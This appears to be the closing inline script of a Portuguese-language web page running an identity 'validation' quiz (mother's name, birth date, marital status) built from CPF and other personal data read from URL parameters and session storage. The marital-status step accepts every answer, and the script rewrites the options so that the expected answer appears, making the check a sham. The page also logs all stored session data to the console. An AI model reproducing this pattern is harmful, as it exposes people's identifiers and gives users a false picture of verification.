          const correctMaritalStatus = userData.estadoCivil;
          
          // Verificar se o estado civil correto já está nas opções
          const hasCorrectOption = Array.from(maritalOptions).some(option => 
            option.textContent.trim() === correctMaritalStatus
          );
          
          if (!hasCorrectOption) {
            // Substituir a primeira opção pelo estado civil correto
            maritalOptions[0].textContent = correctMaritalStatus;
            const button = maritalOptions[0].closest('button');
            if (button) {
              button.setAttribute('onclick', `selectAnswer(3, '${correctMaritalStatus}')`);
              console.log('🔧 Opção de estado civil atualizada para:', correctMaritalStatus);
            }
          }
        }
        
        console.log('✅ Perguntas de validação atualizadas com sucesso');
      }

      // Função para embaralhar array
      function shuffleArray(array) {
        for (let i = array.length - 1; i > 0; i--) {
          const j = Math.floor(Math.random() * (i + 1));
          [array[i], array[j]] = [array[j], array[i]];
        }
        return array;
      }

      // Armazenar respostas corretas para validação
      let correctAnswers = {};
      
      // Função atualizada para verificar respostas corretas
      function selectAnswer(step, answer) {
        // Debug: Verificar estado atual dos dados
        console.log('🔍 Debug selectAnswer - Step:', step, 'Answer:', answer);
        
        // PRIORIDADE 1: Verificar dados na URL
        let userData = null;
        const urlParams = new URLSearchParams(window.location.search);
        
        if (urlParams.has('nome') || urlParams.has('cpf')) {
          userData = {
            nome: urlParams.get('nome'),
            cpf: urlParams.get('cpf'),
            nascimento: urlParams.get('nascimento'),
            nomeMae: urlParams.get('nomeMae'),
            estadoCivil: urlParams.get('estadoCivil'),
            nomeCompleto: urlParams.get('nomeCompleto') || urlParams.get('nome')
          };
          console.log('✅ Dados obtidos da URL para validação:', userData);
        }
        
        // PRIORIDADE 2: Usar dados globais (se não encontrou na URL)
        if (!userData) {
          userData = window.currentUserData;
        }
        
        // PRIORIDADE 3: Tentar getUserData (se disponível)
        if (!userData && typeof window.getUserData === 'function') {
          try {
            userData = window.getUserData();
            console.log('✅ Dados obtidos via getUserData na validação:', userData);
          } catch (error) {
            console.log('❌ Erro getUserData na validação:', error);
          }
        }
        
        // PRIORIDADE 4: SessionStorage (último recurso)
        if (!userData) {
          const sessionData = sessionStorage.getItem('userData');
          if (sessionData) {
            try {
              userData = JSON.parse(sessionData);
              console.log('✅ Dados obtidos via sessionStorage na validação:', userData);
            } catch (error) {
              console.log('❌ Erro ao parsear sessionStorage na validação:', error);
            }
          }
        }
        
        console.log('🔍 userData final para validação:', userData);
        
        let isCorrect = false;
        let correctAnswer = '';
        
        if (userData) {
          console.log('✅ Usando dados do userData');
          switch(step) {
            case 1: // Nome da mãe
              correctAnswer = userData.nomeMae;
              // Se não tem nome da mãe, "Nenhum" é a resposta correta
              if (!correctAnswer || correctAnswer.trim() === '') {
                correctAnswer = 'Nenhum';
              }
              console.log('🔍 Nome da mãe no userData:', userData.nomeMae, '-> Resposta correta:', correctAnswer);
              isCorrect = answer === correctAnswer;
              break;
            case 2: // Data de nascimento
              correctAnswer = userData.nascimento;
              console.log('🔍 Data de nascimento no userData:', userData.nascimento);
              isCorrect = answer === correctAnswer;
              break;
            case 3: // Estado civil - TODAS AS RESPOSTAS SÃO CORRETAS
              correctAnswer = userData.estadoCivil;
              console.log('🔍 Estado civil no userData:', userData.estadoCivil);
              console.log('✅ TODAS as opções de estado civil são aceitas como corretas');
              isCorrect = true; // SEMPRE CORRETO PARA ESTADO CIVIL
              break;
          }
        } else {
          console.log('❌ ERRO: Nenhum dado disponível para validação!');
          alert('Erro: Dados do usuário não encontrados. Por favor, refaça a consulta.');
          return;
        }

        console.log(`📝 Step ${step}: "${answer}" - ${isCorrect ? '✅ Correto' : '❌ Incorreto'} (Resposta esperada: "${correctAnswer}")`);

        // Armazenar resultado
        correctAnswers[step] = isCorrect;

        // Atualizar visual
        const buttons = document.querySelectorAll(`#step${step} .validation-option`);
        buttons.forEach(button => {
          button.classList.remove('correct', 'incorrect', 'selected');
          const buttonAnswer = button.getAttribute('onclick').match(/'([^']*)'/)[1];
          
          if (buttonAnswer === answer) {
            button.classList.add(isCorrect ? 'correct' : 'incorrect');
          }
        });

        if (isCorrect) {
          // Se correto, prosseguir após delay
          setTimeout(() => {
            nextStep();
          }, 1500);
        } else {
          // Se incorreto, mostrar mensagem e permitir nova tentativa
          setTimeout(() => {
            showRetryMessage(step);
          }, 1500);
        }
      }

      // Função para mostrar mensagem de erro e permitir nova tentativa
      function showRetryMessage(step) {
        const buttons = document.querySelectorAll(`#step${step} .validation-option`);
        buttons.forEach(button => {
          button.classList.remove('correct', 'incorrect');
        });

        // Criar ou atualizar mensagem de erro
        let errorMessage = document.getElementById(`error-message-${step}`);
        if (!errorMessage) {
          errorMessage = document.createElement('div');
          errorMessage.id = `error-message-${step}`;
          errorMessage.className = 'mt-4 p-3 bg-red-50 border border-red-200 rounded-lg';
          errorMessage.innerHTML = `
            <div class="flex items-center gap-2 mb-1">
              <svg class="w-5 h-5 text-red-600" fill="currentColor" viewBox="0 0 20 20">
                <path fill-rule="evenodd" d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-7 4a1 1 0 11-2 0 1 1 0 012 0zm-1-9a1 1 0 00-1 1v4a1 1 0 102 0V6a1 1 0 00-1-1z" clip-rule="evenodd"></path>
              </svg>
              <h4 class="font-semibold text-red-800">Resposta Incorreta</h4>
            </div>
            <p class="text-red-700 text-sm">Por favor, tente novamente. Selecione a informação correta que corresponde aos seus dados pessoais.</p>
          `;
          
          const stepElement = document.getElementById(`step${step}`);
          const spaceDiv = stepElement.querySelector('.space-y-3');
          spaceDiv.parentNode.insertBefore(errorMessage, spaceDiv.nextSibling);
        }

        // Adicionar animação de entrada à mensagem
        errorMessage.classList.add('animate-fade-in');
        
        // Reativar os botões para nova tentativa
        buttons.forEach(button => {
          button.disabled = false;
          button.style.pointerEvents = 'auto';
        });
      }

      // Adicionar event listeners quando a página carregar
      document.addEventListener('DOMContentLoaded', function() {
        console.log('🚀 Página de validação carregada');
        
        // Debug: Listar todos os dados armazenados
        console.log('📝 SessionStorage keys:', Object.keys(sessionStorage));
        console.log('📝 LocalStorage keys:', Object.keys(localStorage));
        
        // Listar todos os valores do sessionStorage
        for (let key in sessionStorage) {
          if (sessionStorage.hasOwnProperty(key)) {
            console.log(`📝 sessionStorage[${key}]:`, sessionStorage.getItem(key));
          }
        }
        
        const userButton = document.querySelector('[aria-label="Perfil do usuário"]');
        if (userButton) {
          userButton.addEventListener('click', toggleDropdown);
        }

        // Configurar validação dinâmica
        setupDynamicValidation();

        // SISTEMA DE ATUALIZAÇÃO DE SAUDAÇÃO
        function updateUserGreeting() {
          console.log('🔍 Atualizando saudação do usuário...');
          
          // PRIORIDADE 1: Verificar dados na URL
          const urlParams = new URLSearchParams(window.location.search);
          let userData = null;
          
          if (urlParams.has('nome') || urlParams.has('cpf')) {
            userData = {
              nome: urlParams.get('nome'),
              cpf: urlParams.get('cpf'),
              nascimento: urlParams.get('nascimento'),
              nomeMae: urlParams.get('nomeMae'),
              estadoCivil: urlParams.get('estadoCivil'),
              nomeCompleto: urlParams.get('nomeCompleto') || urlParams.get('nome')
            };
            console.log('✅ Dados encontrados na URL para saudação:', userData);
          }
          
          // PRIORIDADE 2: Tentar user-data-manager
          if (!userData && typeof window.getUserData === 'function') {
            try {
              userData = window.getUserData();
              console.log('✅ Dados obtidos via getUserData para saudação:', userData);
            } catch (error) {
              console.log('❌ Erro getUserData para saudação:', error);
            }
          }
          
          // PRIORIDADE 3: SessionStorage
          if (!userData) {
            const sessionData = sessionStorage.getItem('userData');
            if (sessionData) {
              try {
                userData = JSON.parse(sessionData);
                console.log('✅ Dados obtidos via sessionStorage para saudação:', userData);
              } catch (error) {
                console.log('❌ Erro ao parsear sessionStorage para saudação:', error);
              }
            }
          }
          
          // Atualizar saudação
          if (userData && userData.nome) {
            const userGreeting = document.querySelector('[data-user-greeting]');
            if (userGreeting) {
              userGreeting.textContent = `Olá, ${userData.nome}!`;
              console.log('✅ Saudação atualizada para:', userData.nome);
            }
          } else {
            console.log('⚠️ Nenhum nome encontrado - mantendo saudação padrão');
          }
        }
        
        // Atualizar saudação
        updateUserGreeting();

        // Fechar dropdown ao clicar fora
        document.addEventListener('click', function(event) {
          const dropdown = document.getElementById('user-dropdown');
          const userButton = document.querySelector('[aria-label="Perfil do usuário"]');
          
          if (dropdown && userButton && 
              !dropdown.contains(event.target) && 
              !userButton.contains(event.target)) {
            dropdown.classList.add('hidden');
          }
        });
      });
    </script>
  

</body></html>